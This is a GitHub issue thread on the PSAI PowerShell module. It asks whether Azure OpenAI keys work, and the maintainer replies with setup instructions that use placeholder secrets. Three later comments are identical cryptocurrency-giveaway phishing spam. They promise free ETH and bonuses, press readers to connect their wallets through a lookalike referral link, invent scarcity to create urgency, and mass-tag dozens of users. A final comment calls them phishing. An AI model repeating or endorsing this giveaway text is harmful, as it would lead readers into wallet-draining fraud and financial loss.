### ISSUE TITLE
Can I use Azure OpenAI? 

### ISSUE THREAD

**Issue by stej** [dfinke/PSAI#1]
I've got access to api keys for `Azure OpenAI`. Tried the keys, but with no luck.

```
Administrator Mem 79% |9ms|🕙[ 13:10:33 ] ➜  Invoke-OAIChat 'How do I output all files in a directory PowerShell?'
Invoke-OAIBeta: C:\Users\kklm\OneDrive\Documents\PowerShell\Modules\PSAI\0.1.0\Public\New-OAIAssistant.ps1:72
Line |
  72 |      Invoke-OAIBeta -Uri $url -Method $Method -Body $body
     |      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | Incorrect API key provided: abc********************be66. You can find your API key at https://platform.openai.com/account/api-keys.
```

It there any way how to use that keys, or is that a different world?

(I copied the keys from this page)
![image](https://github.com/dfinke/PSAI/assets/253560/9d2c46ff-37e9-4d7d-8569-ef41acc0977b)

**Comment by dfinke** [comment]
Thanks for trying PSAI. Same world. Azure will always lag behind till they onboard the new features from OpenAI.

I added the README  https://github.com/dfinke/PSAI?tab=readme-ov-file#support-for-azure-openai.

## Support for Azure OpenAI 

After creating an [Azure OpenAI resource](https://learn.microsoft.com/en-us/azure/ai-services/openai/how-to/create-resource?pivots=web-portal), you can use the `PowerShellAIAssistant` module to interact with it. 

You need to get the following secrets form the Azure Portal and Azure AI Studio - `apiURI`,`apiVersion`,`apiKey`,`deploymentName`.

```powershell
$secrets = @{
    apiURI         = "<Your Azure OpenAI API URI>"
    apiVersion     = "<Your Azure OpenAI API Version>"
    apiKey         = "<Your Azure OpenAI API Key>"
    deploymentName = "<Your Azure OpenAI Deployment Name>"
}

Set-OAIProvider AzureOpenAI
Set-AzOAISecrets @secrets
```

**Comment by josuecv26** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
rwanyoike, @revotu, @pr0d1r2, @rorypeck, @yikuang, @ehsan-fj, @openwayne, @5cs, @nyirocsaba, @rottenMonke, @RazTeve, @heryandi, @brunneis, @kalpetros, @qsnapper, @vinhloc30796, @guodonghe, @SabaDeMa, @24mlight, @traciborski, @mlukianenk, @ludwigtuerme, @xchanmolx, @aaa888999, @knmai, @iAndrew25, @movprojects, @pedrosimoes79, @aiwgeneral, @cooka, @yrsunuwar, @YukinoshitaSherry, @pacoccino, @Javitronxo, @takuan-osho, @miketlk, @Tomburgs, @raymondSeger, @techom, @ProtonGustave, @bonfy, @thesufian, @juliankohlman, @aswathm78, @Lc0rE, @eaorak, @trent-boyd, @JohnMuller-code, @pranjalanimesh, @MatiMenich

**Comment by Lirikkk** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
Adangge, @ericmm, @AsiaDoIt, @alongalperin, @BertRepo, @teremo4ek, @PiercingDan, @banguje, @echandler, @kys6879, @hkedia321, @xushangning, @wainola, @amlana21, @seweso, @OfficialDarkComet, @andersonbosa, @NikhilDoWhile, @auspbro, @120910383, @Alihusainy, @ingridinara, @akullpp, @edu-ricardo, @abarrak, @netsesame, @yangbinnnn, @nimble-123, @ChingG0, @johnfelipe, @jaumesala, @eltNEG, @yozhikvtumane, @c2v4, @HouLinwei, @huang47, @luontola, @hffaust, @Your-soul-is-mine, @mluisbrown, @SudShekhar, @wl199601, @speckz, @jeffbarg, @gourab98, @AshkanShakiba, @eddiejbrady, @cdson, @Xroute53, @AnattaGuo

**Comment by avijit14** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
dochang, @mikepack, @ziwon, @kuops, @TheDhejavu, @bro-xuan, @joaorafaelm, @abc0xmattyic333, @danihodovic, @scottliu2011, @leorog, @bvr33, @BurnzZ, @Omegu, @mytxd, @kbrownehs18, @dimpu47, @brndnsvr, @priom, @rergw, @cloudfreexiao, @sghost13, @bonham000, @HarmonicHemispheres, @osluk, @hanksudo, @kallydev, @limakzi, @bafbomb, @zern3w, @palyaros02, @andrewDACQ, @RocketRene, @chuangbo, @yumao5, @umtksa, @anthony95macias, @eugene-yh, @paran0ids0ul, @mhinz, @kynrai, @rahulzomato, @fvarli, @dinhnhat0401, @ZG1711, @ManneredChimpanzee, @caofanCPU, @itszhengan, @branevukmirovic, @axjs

**Comment by mluisbrown** [comment]
@dfinke please delete the above spam / phishing message.
